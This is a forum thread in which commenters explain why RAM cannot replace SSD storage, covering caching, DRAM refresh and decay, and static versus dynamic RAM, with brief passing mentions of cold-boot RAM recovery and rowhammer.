In a similar vein, why can we not use the technology of RAM to prolong the life-cycle of an SSD?

  • Lemvi@lemmy.sdf.org
    link
    fedilink
    English
    arrow-up
    58
    arrow-down
    2
    ·
    1 year ago

    Writing to an SSD damages the SSD, however things saved to an SSD are persistent, meaning the data isn’t lost when the SSD doesn’t get any power. Writing to RAM doesn’t damage it and it is also quicker. However, data saved on RAM is not persistent, meaning that all data is lost as soon as the RAM is not connected to a power source. Also, RAM is a lot more expensive than SSD storage.

    RAMs are already used to avoid writing to (or reading from) the SSD or HDD when possible, the concept is called “Caching”

    • grahamsz@kbin.social
      link
      fedilink
      arrow-up
      29
      arrow-down
      3
      ·
      1 year ago

      Even if it’s powered, RAM will lose its data on the order of a tenth of a second. RAM doesn’t just require power, it requires that your computer constantly read and rewrite it - so every 64ms your computer has to read every gigabyte of RAM and write it back.

        • grahamsz@kbin.social
          link
          fedilink
          arrow-up
          4
          ·
          1 year ago

          Some very early systems did do it at kernel level, but yeah you are correct. Though I’d also consider the dram chips to be part of the computer and DRAM refresh makes up a good part of your phones battery consumption at standby.

        • rickdgray@lemmy.world
          link
          fedilink
          English
          arrow-up
          2
          ·
          1 year ago

          Dynamic RAM tracks bits by using a capacitor for each bit. Caps’ charge bleeds out so you have to top it off again every so often. The way you do that is to just write the same data back again. So it reads and writes the same data to itself every refresh. The opposition to this is static RAM which does not use a capacitor and is just a clever arrangement of transistors. No refresh needed. It’s not typically used commercially except under special requirements, though as transisters are significantly more expensive. So the refresh strategy is the better choice for consumer hardware. DRAM has been dominant for decades.

        • al177@lemmy.sdf.org
          link
          fedilink
          English
          arrow-up
          2
          ·
          edit-2
          1 year ago

          If you ever have the chance to use an old Apple II computer, run a text mode program, wait til the owner is looking in the other direction and turn the power off and back on quickly.

          For about a second, before you hear the loud BOOP and the screen clears, you’ll see whatever was on the screen just before you powered it off. But a few characters will be corrupted. Try it again, and wait a half a second longer than before. More characters will be corrupted.

          For that brief second you’re looking at the contents of the video RAM, then the ROM (Apple called what we call BIOS now “ROM”) clears the contents and puts up the familiar text banner. The longer the power stays off, the more the contents of those RAM cells decay, and any bit flip will show up as a different character at the corresponding location on the screen.

          On a side note, there was an article in the early '80s in Circuit Cellar by Steve Ciarcia showing how you could make a rudimentary digital camera by prying the top off a DRAM chip (some were ceramic with metal lids, or just metal cans) and adding a CCTV camera lens at the right distance. Light can deplete the charge in DRAM cells even faster, and by writing all 1s to the memory, exposing it to light, and reading back the contents, you could get a black and white image of whatever’s shining on the chip.

      • CaptPretentious@lemmy.world
        link
        fedilink
        English
        arrow-up
        3
        ·
        1 year ago

        If I remember, the decay of information in RAM is slower than that. This is an old memory, but I recall I think someone on TechTV talking about how you could, if fast enough, remove a module from one machine and put it in another, and if done right, potentially get the information off it.

        • MaxHardwood@lemmy.ca
          link
          fedilink
          English
          arrow-up
          2
          ·
          1 year ago

          It’s possible, and can be done at home. You need to literally freeze the RAM very quickly (typically with CO2) and transfer it to the new system. Then you dump the contents of the stick and hopefully find an encryption key.

        • grahamsz@kbin.social
          link
          fedilink
          arrow-up
          1
          ·
          1 year ago

          From what i’ve read it’s temperature dependent, and at room temp some dram cells might take as long as 10 seconds to decay. The 64mS refresh is a super conservative call because it’s really bad when random bits go missing out of memory. The decay is faster at high temperatures, but some dram controllers might actually adjust based on temperature.

      • Julian@lemm.ee
        link
        fedilink
        English
        arrow-up
        10
        ·
        1 year ago

        Doesn’t the ram do that itself? Otherwise reading/writing all that data would waste tons of time for the CPU.

        • grahamsz@kbin.social
          link
          fedilink
          arrow-up
          23
          ·
          1 year ago

          Yes - it’s been the job of the DRAM controller for almost the entire history of computing. But that’s still a part of the computer and if it stops working then your RAM will go blank in a fraction of a second

        • thepianistfroggollum@lemmynsfw.com
          link
          fedilink
          English
          arrow-up
          6
          ·
          1 year ago

          It’s been a very long time since my computer engineering course, and we didn’t cover this topic specifically, but I highly doubt it’s a full dump and reload. What likely happens is each ram address has a ttl flag or some way for the CPU to know when to rewrite the data, and it does it as needed.

          Plus, the bus between the CPU and ram is ridiculously fast. Your pc could dump and reload all of its ram in the time it takes you to blink. And, with multiple cores, the task can be allocated to a single core, or divided up among all of them.

          • PeterPoopshit@lemmy.world
            link
            fedilink
            English
            arrow-up
            1
            ·
            1 year ago

            At least on older x86 motherboards, there used to be a dram refresh interrupt. It would trigger every 15 or so milliseconds and tell the dram controller to do a bus hold request and then refresh the ram. This bus hold request means the cpu can’t access the ram when this happens (it can still run stuff in the cache) but at least you aren’t wasting as much cpu time on dram refresh this way.

          • al177@lemmy.sdf.org
            link
            fedilink
            English
            arrow-up
            2
            ·
            1 year ago

            Modern RAM just needs to be told to refresh. The device itself will go through the refreshing process. But the whole array needs to be refreshed, there’s no LRU scheme to tell what bank or row was last accessed.

            Starting with DDR3 it’s not so easy. Density is so high that reading or writing one row affects cells in adjacent rows. Partial target row refresh (PTRR) counters this, where any access of a row is followed by a refresh of adjacent rows. Flaws in this process in early DDR3 controllers was at the heart of rowhammer exploits, where repeated accesses to a memory location could work out what’s stored in physically adjacent memory, even if it’s not privileged. IIRC DDR4 pulled the PTRR process into the RAM’s built in refresh circuitry so it’s transparent to the memory controller.